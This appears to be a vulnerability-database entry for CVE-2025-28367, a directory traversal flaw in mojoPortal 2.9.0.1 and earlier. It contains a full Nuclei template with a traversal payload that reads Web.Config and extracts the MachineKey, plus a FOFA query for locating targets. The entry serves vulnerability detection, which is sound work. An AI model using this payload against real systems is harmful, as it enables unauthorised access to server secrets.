漏洞描述
mojoPortal <=2.9.0.1 is vulnerable to Directory Traversal via BetterImageGallery API Controller - ImageHandler Action. An attacker can exploit this vulnerability to access the Web.Config file and obtain the MachineKey.
CVE-2025-28367: mojoPortal <=2.9.0.1 - Directory Traversal
PoC代码[已公开]
id: CVE-2025-28367
info:
name: mojoPortal <=2.9.0.1 - Directory Traversal
author: DhiyaneshDk
severity: medium
description: |
mojoPortal <=2.9.0.1 is vulnerable to Directory Traversal via BetterImageGallery API Controller - ImageHandler Action. An attacker can exploit this vulnerability to access the Web.Config file and obtain the MachineKey.
reference:
- https://github.com/i7MEDIA/mojoportal
- https://www.0xlanks.me/blog/cve-2025-28367-advisory/
- https://nvd.nist.gov/vuln/detail/CVE-2025-28367
classification:
epss-score: 0.09211
epss-percentile: 0.92418
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-28367
cwe-id: CWE-284
metadata:
verified: true
max-request: 1
fofa-query: app="mojoportal"
tags: cve,cve2025,mojoportal,lfi,vkev
http:
- method: GET
path:
- "{{BaseURL}}/api/BetterImageGallery/imagehandler?path=../../../Web.Config"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<machineKey"
- "<system.web>"
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221009ec2c25b270831824571e5991f14a6f49231782c2cd208002fe1ea225d9ff97402203597dcd81a2e2e304f696feca45d349d1747cd109d9a6e21b76c2433e8e872f5:922c64590222798bb761d5b6d8e72950